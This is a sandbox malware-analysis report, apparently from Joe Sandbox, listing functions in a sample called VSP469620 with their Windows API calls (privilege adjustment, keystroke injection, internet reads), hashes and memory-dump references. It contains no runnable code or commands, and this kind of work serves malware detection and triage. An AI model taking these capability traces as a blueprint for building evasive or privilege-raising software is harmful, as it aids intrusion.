                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: lstrlen
                                                              • String ID: ($|
                                                              • API String ID: 1659193697-1631851259
                                                              • Opcode ID: 9a700f9c22400b15bd6f323b1f149919b39484617cff19c254d1ed8a917c56dc
                                                              • Instruction ID: fe5e1a8ab0db20c5283c59f1e65d97822f0fbd5304cb6a10f28a06159d425de5
                                                              • Opcode Fuzzy Hash: 9a700f9c22400b15bd6f323b1f149919b39484617cff19c254d1ed8a917c56dc
                                                              • Instruction Fuzzy Hash: 1A3214B5A00605DFC728CF69C480A6AB7F0FF48320B55C56EE59ADB3A1E770E941CB44
                                                              Function 00ACB11F Relevance: 4.9, APIs: 3, Instructions: 377COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00ACB34E: GetWindowLongW.USER32(?,000000EB), ref: 00ACB35F
                                                              • DefDlgProcW.USER32(?,?,?,?,?), ref: 00ACB22F
                                                                • Part of subcall function 00ACB55D: DefDlgProcW.USER32(?,00000020,?,00000000), ref: 00ACB5A5
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Proc$LongWindow
                                                              • String ID:
                                                              • API String ID: 2749884682-0
                                                              • Opcode ID: fd762ddb3ae6967567bd1343c90311f090642a4e579262ab93e7c7604429ea10
                                                              • Instruction ID: e60383f44d29ef497d023deef760996fa34d712989c9609360ac2767a1a1cbbb
                                                              • Opcode Fuzzy Hash: fd762ddb3ae6967567bd1343c90311f090642a4e579262ab93e7c7604429ea10
                                                              • Instruction Fuzzy Hash: D4A15470134015BADA28AB2E6C8AFFF39ACEB52344F56415DF41AD6692CF26DC00D672
                                                              Function 00B04EB5 Relevance: 4.7, APIs: 3, Instructions: 155networkfileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00B043BF,00000000), ref: 00B04FA6
                                                              • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00B04FD2
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Internet$AvailableDataFileQueryRead
                                                              • String ID:
                                                              • API String ID: 599397726-0
                                                              • Opcode ID: 34e957e8d26c424a2bd635ce7a639777c08b0adda15accdd5d9aa88a65a77c30
                                                              • Instruction ID: 37ece86d263783ccc51e9f406138d20cf8ef0b7d32623abc400b951d034c764e
                                                              • Opcode Fuzzy Hash: 34e957e8d26c424a2bd635ce7a639777c08b0adda15accdd5d9aa88a65a77c30
                                                              • Instruction Fuzzy Hash: 9141C7B150420ABFEB219E94DD81EBF7BFCEB40754F1040AEF705661C0EB719E419AA0
                                                              Function 00AFE1FD Relevance: 4.6, APIs: 3, Instructions: 72COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetErrorMode.KERNEL32(00000001), ref: 00AFE20D
                                                              • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00AFE267
                                                              • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00AFE2B4
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: ErrorMode$DiskFreeSpace
                                                              • String ID:
                                                              • API String ID: 1682464887-0
                                                              • Opcode ID: 7dbcf73e50ed5d281907b71a5be3f68774306bc974757106a504a4f79ac41e93
                                                              • Instruction ID: 85980aee3bfb60342de59217796aaebee56ecfd3494a768f2940fbb74db10868
                                                              • Opcode Fuzzy Hash: 7dbcf73e50ed5d281907b71a5be3f68774306bc974757106a504a4f79ac41e93
                                                              • Instruction Fuzzy Hash: BC213A35A00618EFCB00EFA5D985EEEFBB8FF48310F1484AAE945AB251DB319915CB50
                                                              Function 00AEB134 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00ACF4EA: std::exception::exception.LIBCMT ref: 00ACF51E
                                                                • Part of subcall function 00ACF4EA: __CxxThrowException@8.LIBCMT ref: 00ACF533
                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00AEB180
                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00AEB1AD
                                                              • GetLastError.KERNEL32 ref: 00AEB1BA
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                              • String ID:
                                                              • API String ID: 1922334811-0
                                                              • Opcode ID: e044a21d72f9252ac5a41690b146d76d57b9dfb523d602a6f60e3f12bcc6603e
                                                              • Instruction ID: c343956d4c1aa11043262dc951abf18784d2a5a9acbc0ed06a706265b44c6e4f
                                                              • Opcode Fuzzy Hash: e044a21d72f9252ac5a41690b146d76d57b9dfb523d602a6f60e3f12bcc6603e
                                                              • Instruction Fuzzy Hash: 4E11CEB2514204AFE718AF65EDC9D6BB7BDFB44720B20852EE05693240DB70FC418A60
                                                              Function 00AF6685 Relevance: 4.6, APIs: 3, Instructions: 61fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00AF66AF
                                                              • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,0000000C,?,00000000), ref: 00AF66EC
                                                              • CloseHandle.KERNEL32(00000000,?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00AF66F5
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: CloseControlCreateDeviceFileHandle
                                                              • String ID:
                                                              • API String ID: 33631002-0
                                                              • Opcode ID: 5b25de9e15431001d96e965e6011da3c37c3553bad9fdea47ed49d4041108e0b
                                                              • Instruction ID: 0dbad55bab9c8e8f6957212b72f49607d54b344ffb1bfd29a701a38284b449fe
                                                              • Opcode Fuzzy Hash: 5b25de9e15431001d96e965e6011da3c37c3553bad9fdea47ed49d4041108e0b
                                                              • Instruction Fuzzy Hash: 961182B1900228BEE7109BA8DC45FBFB7BCEB04714F104555FA01E7190C3749E0487A5
                                                              Function 00AF71FA Relevance: 4.5, APIs: 3, Instructions: 42memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00AF7223
                                                              • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00AF723A
                                                              • FreeSid.ADVAPI32(?), ref: 00AF724A
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: AllocateCheckFreeInitializeMembershipToken
                                                              • String ID:
                                                              • API String ID: 3429775523-0
                                                              • Opcode ID: 5aff58cc77586ea71a29dbdb8f0557debc020546fd04c2f8d81261d56a820cb2
                                                              • Instruction ID: 34e3f9fb6df3110c99986c2a6c4814ad5fbaa19074af4277ab5a3ca1aa452853
                                                              • Opcode Fuzzy Hash: 5aff58cc77586ea71a29dbdb8f0557debc020546fd04c2f8d81261d56a820cb2
                                                              • Instruction Fuzzy Hash: EDF01776A14209BFDF04DFF4DD99AEEBBB8EF08601F104869A602E3191E6709A448B10
                                                              Function 00AFF56F Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FindFirstFileW.KERNEL32(?,?), ref: 00AFF599
                                                              • FindClose.KERNEL32(00000000), ref: 00AFF5C9
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Find$CloseFileFirst
                                                              • String ID:
                                                              • API String ID: 2295610775-0
                                                              • Opcode ID: a7a46f13b1fdbc46a60dad8a7405ed29d57e3df52e97d8937520f72bde37bef9
                                                              • Instruction ID: 34f893e3fdb025c382cb1563217310c55cd6b58b0d1b2ef00b3e7f0a2d8b877d
                                                              • Opcode Fuzzy Hash: a7a46f13b1fdbc46a60dad8a7405ed29d57e3df52e97d8937520f72bde37bef9
                                                              • Instruction Fuzzy Hash: DD11AD326046049FD710EF68D845A2EF3E8FF84324F008A1EF9A9DB291CF30AD008B81
                                                              Function 00AFCE7A Relevance: 3.0, APIs: 2, Instructions: 30windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00B0BE6A,?,?,00000000,?), ref: 00AFCEA7
                                                              • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00B0BE6A,?,?,00000000,?), ref: 00AFCEB9
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: ErrorFormatLastMessage
                                                              • String ID:
                                                              • API String ID: 3479602957-0
                                                              • Opcode ID: f1b42226fbaa733629909fcbc0d0855a4d4d2cdfbd6ac45989315818dfc86fd8
                                                              • Instruction ID: 660cadf4cbba1fc6bdeb292fc32e8f4bd83fb948249fd579cc3cc15e1e92c0f6
                                                              • Opcode Fuzzy Hash: f1b42226fbaa733629909fcbc0d0855a4d4d2cdfbd6ac45989315818dfc86fd8
                                                              • Instruction Fuzzy Hash: 53F0823510022DEBDB10ABA5DC49FFE776DBF08361F004166F915D7182D630DA50CBA1
                                                              Function 00AF411C Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00AF4153
                                                              • keybd_event.USER32(?,7707C0D0,?,00000000), ref: 00AF4166
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: InputSendkeybd_event
                                                              • String ID:
                                                              • API String ID: 3536248340-0
                                                              • Opcode ID: 4da5f5bb12a61d2e15ce8e94469030ae4613c795d7a91292b8c4360ff5e32617
                                                              • Instruction ID: 2476ef264aecc3268b454dbd7de9ec837750e1f3f5c376d7b946831d5f9fff9d
                                                              • Opcode Fuzzy Hash: 4da5f5bb12a61d2e15ce8e94469030ae4613c795d7a91292b8c4360ff5e32617
                                                              • Instruction Fuzzy Hash: 16F0677080024DAFEB058FA0C805BBEBBB0EF14305F00800AFA66A6192D77986169FA4
                                                              Function 00AEAB84 Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00AEACC0), ref: 00AEAB99
                                                              • CloseHandle.KERNEL32(?,?,00AEACC0), ref: 00AEABAB
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: AdjustCloseHandlePrivilegesToken
                                                              • String ID:
                                                              • API String ID: 81990902-0
                                                              • Opcode ID: 1a339370d5046b161a8abaf8bbc5720dd4ce3258b56e8213b4b8cbec60c96d0c
                                                              • Instruction ID: 1ccc3b12dcd3121f9ff4174b3a74e13ad92e8a1de8ce3dd6f242c6ea5ea591dc
                                                              • Opcode Fuzzy Hash: 1a339370d5046b161a8abaf8bbc5720dd4ce3258b56e8213b4b8cbec60c96d0c
                                                              • Instruction Fuzzy Hash: EFE0E671004510AFEB252F55FD05DB777EAEF04320721882DF55A81470DB736C90DB50
                                                              Function 00AD81AC Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,0000000E,00AD6DB3,-0000031A,?,?,00000001), ref: 00AD81B1
                                                              • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00AD81BA
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: ExceptionFilterUnhandled
                                                              • String ID:
                                                              • API String ID: 3192549508-0
                                                              • Opcode ID: 57de3064a956d4be3e856000b2bd1b60e6fb0ce297416e2581f0a61011253702
                                                              • Instruction ID: 7316702227e70731ade87276c2a4c732e4850c3b153cda391a2a0bbbd4f384ba
                                                              • Opcode Fuzzy Hash: 57de3064a956d4be3e856000b2bd1b60e6fb0ce297416e2581f0a61011253702
                                                              • Instruction Fuzzy Hash: F4B09231144608ABDB002BA1FC09B9C7F68EB08652F204010F60D460618F7268208A9A
                                                              Function 00AB77B0 Relevance: 2.6, APIs: 1, Instructions: 1076COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: _memmove
                                                              • String ID:
                                                              • API String ID: 4104443479-0
                                                              • Opcode ID: dc889d8d38e423f5409fda2d29b0737e14574fe600e1da66c90ec0b00c1a9243
                                                              • Instruction ID: 4c479c5895752754715ef46d63c1e1e7c798b688e4613a57f0d8881fcd94a19a
                                                              • Opcode Fuzzy Hash: dc889d8d38e423f5409fda2d29b0737e14574fe600e1da66c90ec0b00c1a9243
                                                              • Instruction Fuzzy Hash: 8FA23774A04219CFDB24CF58C8806EDBBB5FF88314F2581A9E859AB391D7749E81DF90
                                                              Function 00AB7FA3 Relevance: 2.3, APIs: 1, Instructions: 806COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: _memmove
                                                              • String ID:
                                                              • API String ID: 4104443479-0
                                                              • Opcode ID: f9bcc8b98b1307d9dbab1fca11eec4843f071fbac5c347923985e445179b58ab
                                                              • Instruction ID: bcad5ad9753d276b995ffc7bc626555fa9949cc2e2c7806386f5227efb8bb58c
                                                              • Opcode Fuzzy Hash: f9bcc8b98b1307d9dbab1fca11eec4843f071fbac5c347923985e445179b58ab
                                                              • Instruction Fuzzy Hash: 3D727975A00219DFCF24CF58C4806EDBBF6FF88314F2586AAD855AB251D774AE81CB90
                                                              Function 00ADD1B9 Relevance: 2.1, APIs: 1, Instructions: 645COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3686e15ee7a1da3be2d25cefaa3403841510346fe42f379c0799f61ed8ce95a6
                                                              • Instruction ID: aab6b9a0a57d7e0f1454bfeaf9f64f419571b951f5868c2488c7107fb9262348
                                                              • Opcode Fuzzy Hash: 3686e15ee7a1da3be2d25cefaa3403841510346fe42f379c0799f61ed8ce95a6
                                                              • Instruction Fuzzy Hash: 43322631D69F014DD7235638C822339A298AFB73C4F55D727F81AB6EA6EF29C9835100
                                                              Function 00AB96C0 Relevance: 2.1, APIs: 1, Instructions: 573COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: __itow__swprintf
                                                              • String ID:
                                                              • API String ID: 674341424-0
                                                              • Opcode ID: 456a00a93af13294236b76aaebedeccbb6d24a9b373b4deabed0b7342cbe872e
                                                              • Instruction ID: 0b4792e8f2ed06cff43b76bd09859f5af351d5f11ca25cf2de3d89f6a44a6d91
                                                              • Opcode Fuzzy Hash: 456a00a93af13294236b76aaebedeccbb6d24a9b373b4deabed0b7342cbe872e
                                                              • Instruction Fuzzy Hash: E8228B716083119FD724DF24C991BAFBBE8EF84310F10491DF99A9B292DB71E945CB82
                                                              Function 00AE038E Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 34e7d58ff1712277d3a9e5760ef629c559f5cd80b3d73caf23dd0660c39f8b92
                                                              • Instruction ID: 15d83d7e726c9553ed5be6beae363b1f352551a914fd5a8dd8caadbc7efad4b7
                                                              • Opcode Fuzzy Hash: 34e7d58ff1712277d3a9e5760ef629c559f5cd80b3d73caf23dd0660c39f8b92
                                                              • Instruction Fuzzy Hash: 0BB1E224D2AF414ED72396398831336B65CBFBB2D5F91D71BFC1A75E62EB2186834180
                                                              Function 00AFB6CC Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __time64.LIBCMT ref: 00AFB6DF
                                                                • Part of subcall function 00AD344A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00AFBDC3,00000000,?,?,?,?,00AFBF70,00000000,?), ref: 00AD3453
                                                                • Part of subcall function 00AD344A: __aulldiv.LIBCMT ref: 00AD3473
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
